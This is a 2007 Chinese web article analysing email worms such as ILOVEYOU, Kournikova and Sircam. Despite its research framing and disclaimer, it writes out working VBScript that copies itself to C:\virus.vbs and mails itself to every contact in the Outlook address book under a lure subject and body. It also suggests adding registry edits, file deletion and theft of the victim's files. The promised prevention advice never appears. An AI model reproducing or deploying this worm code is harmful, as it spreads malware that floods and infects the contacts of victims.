 |
流行病毒分析 |
|
|
| 流行病毒分析 |
|
| 作者:热蛾子 文章来源:西祠胡同 点击数: 更新时间:2007-8-17 1:52:20 |
|
最近气候温和,病毒滋生。先有“广外女生”木马病毒摆姿弄骚,后“齿轮先生”又出来逞凶,美国佬也哇哇叫唤“RED CODE”搞死他们了,连国防部都要关门。真是世道不平,人心惶惶啊。大家还是都把电脑关关,微软杀杀了吧!整个世界清净了。
现在互联网成了病毒传播最佳通道,当然“天杀的微软”贡献也不小。现在大多数病毒都是通过EMAIL传播的。而且手段相似,无非是在附件中安置病毒本体,然后利用人类天生的好奇心,通过邮件主题或邮件内容诱惑人们点击附件中的病毒体。比如I Love You , 库尔尼科娃病毒、蔡依林裸照病毒、Sircam也一样。收信人在收到邮件后,发现这些诱人的内容,就轻易会中这样的病毒。
其实,这些病毒都没什么了不起,毕竟诱导让人们去点击附件里的病毒程序,如果真是直接告诉你这就是病毒,那它也没什么繁衍机会了。
能自我复制、扩散的程序就可以成为病毒了。Windows系统之所以还没有成为病毒是因为它目前没有自我复制。不过,“破坏性”对人们的印象比自我复制更深。
其实病毒是很容易制造的(不复杂的病毒),比如流行的脚本病毒,都利用视窗系统的开放性的特点。特别是COM到COM+的组件编程思路,一个脚本程序能调用功能更大的组件来完成自己的功能。以VB脚本病毒(如欢乐时光、 I Love You 、库尔尼科娃病毒、Homepage病毒等)为例,他们都是把.vbs脚本文件添在附件中,最后使用*.htm.vbs等欺骗性的文件名。
我们以普通的vb脚本来看看。
Set objFs=CreateObject(“Scripting.FileSystemObject”)‘创建一个文件操作对象
objFs.CreateTextFile("C:\virus.txt", 1)‘通过文件操作对象的方法创建了一个TXT文件。
如果我们把这两句话保存成为.vbs的VB脚本文件,点击就会在C盘中创建一个TXT文件了。
倘若我们把第二句改为:
objFs.GetFile(WScript.ScriptFullName).Copy("C:\virus.vbs")
就可以将自身复制到c盘virus.vbs这个文件。它的意思是把程序本身的内容COPY到目的地。这样就让这么简单的两句话实现了自我复制的功能,已经具备病毒的基本特征。如果我们要给它添加感染特性,
Set objOA=Wscript.CreateObject("Outlook.Application") ‘创建一个OUTLOOK应用的对象
Set objMapi=objOA.GetNameSpace("MAPI")‘取得MAPI名字空间
For i=1 to objMapi.AddressLists.Count‘遍历地址簿
Set objAddList=objMapi.AddressLists(i)
For j=1 To objAddList. AddressEntries.Count
Set objMail=objOA.CreateItem(0)
objMail.Recipients.Add(objAddList. AddressEntries(j)) ‘取得邮件地址,收件人
objMail.Subject = "你好!"
objMail.Body = "这次给你的附件是我的新文档!"
objMail.Attachments.Add(“c:\virus.vbs")‘把自己作为附件扩散出去
objMail.Send‘发送邮件
Next
Next
Set objMapi=Nothing
Set objOA=Nothing
上面的代码就通过又把自己以附件的方式扩散出去。
我们可以看出,仅仅这么简单的代码,就能成为具有自我复制、繁殖、骚扰网络的病毒了。当然,我们可以为它添加更多的本领,比如:修改注册表、删除文件、发送被感染者的文件、隐藏自己,感染其他文件。其实,以目前视窗系统的编程开放特性,上面的功能都很容易实现。一个中级的VB程序员,没有任何的汇编知识,很容易就能制作类似的蠕虫病毒。
计算机世界的不断发展,界面的友好性以及代码开放性都为病毒的产生提供更好的平台。一个程序简单的病毒,同样能够成为破坏力强大的超级病毒。可以这么说:病毒制作早已经进入高级编程阶段。不会低级机器语言的程序员,也能够制作功能强大的病毒。
正是因为病毒制作进入高级编程阶段,使得病毒的制作更加容易,更多稍微有编程基础的人就能写出病毒来。同时,象脚本病毒这样的代码,如果不加密,它的原程序也能轻松看见,这被更多的有低级趣味的低级程序员所利用。从 I Love You 等脚本病毒开始,它们的代码也象病毒一样扩散开来,被人改装过后就发展成新的病毒,什么Homepage、Mayday等,都几乎差不多。最近,又有人改装成Jessica Worm病毒,用“163电子邮箱收费通知”做标题,其基本代码和扩散部分代码完全是I Love You 病毒的D版。
本文讲解的内容主要是针对最近各种病毒蔓延而作的。一是告诉大家现在病毒没什么了不起,二是告诉大家防止病毒感染的方案。也要说明的是,病毒制作早已经进入高级编程阶段,通过改装代码继续扩散病毒的人,该住手了。
本人写这篇文章只是作为技术研究,没有任何其他意思。如果有人利用本文提供的内容作破坏,都与本人无关。
限于本人的水平,文中有误的地方请多包含指教。
|
|
| 文章录入:郝丽 责任编辑:郝丽 |
|
|
上一篇文章: 病毒分析与防范技术
下一篇文章: 没有了 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
